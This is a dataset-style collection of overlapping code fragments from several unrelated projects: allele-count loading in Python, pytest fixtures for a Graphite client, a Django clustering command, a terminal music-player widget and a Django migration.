samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample", "desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig,", "-p %s' % pdir) # Store these two dicts for each host-species pair", "35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])]", "['ERR3405741', 'ERR3405661', 
'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples at", "numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load information about site", "at specific sites # where sites are provided as (contig, location, gene_id) tuples" ]
[ "1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy',", "return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943), ('streeteasy', 13424,", "('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124,", "@pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia',", "('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [", "'::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124),", "performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [", "return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list():", "('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923),", "@pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534,", "def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223),", "metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943), ('streeteasy',", "metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def", "metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def", "return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture 
def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list():", "[ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return", "pytest @pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return", "import pytest @pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp():", "@pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923", "def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture", "@pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)]", "<reponame>zillow/aiographite import pytest @pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def", "['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return", "return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534),", "'<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow',", "def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943),", "124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow',", "223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958),", "def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): 
return 1471640923 @pytest.fixture", "('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia',", "53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223,", "13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad',", "[ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943), ('streeteasy', 13424, 1471640989)]", "timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad'," ]
[ "import compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for", "import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self,", "clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing clusters. ''' compute_clusters()", "from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.'", "BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self, *args,", "aedes_server.core.clusters import compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters", "'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing clusters. '''", "Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): '''", "help = 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing", "class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options):", "compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot", "= 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing clusters.", "django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def", "from aedes_server.core.clusters import compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate" ]
[ "_initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text def", "self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected", "from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet", "def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text", "_row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def", "text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the widget \"\"\"", "pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2", "text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass", "return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the widget", "{} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\"", "import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def 
__init__(self,window:py_cui.widget_set.WidgetSet):", "_column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\"", "pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def", "def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {}", "__init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No", "_center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual", "self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" 
Actual path: {} No Song", "No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function", "SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config()", "\"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the", "row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path)", "window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path:", "py_cui from pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0", "SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False", "File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window", "path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self):", "import SongFile 
from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3", "file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile):", "Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that", "_column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self):", "from pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2", "_row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path()", "import py_cui from pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel:", "Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure", "FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column,", "class 
SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center)", "self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return", "def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the widget \"\"\" self.block_label._draw_border=True", "Actual path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def" ]
[ "] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True, unique=True), ), ]", "Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\",", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ]", "[ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True,", "3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations =", "# Generated by Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models", "models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField(", "10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"),", "migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [", "class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\",", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations", "\"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, 
editable=False, null=True, unique=True), ),", "on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\",", "dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True,", "Generated by Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class", "by Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration):", "= [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False,", "(\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True, unique=True),", "Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies" ]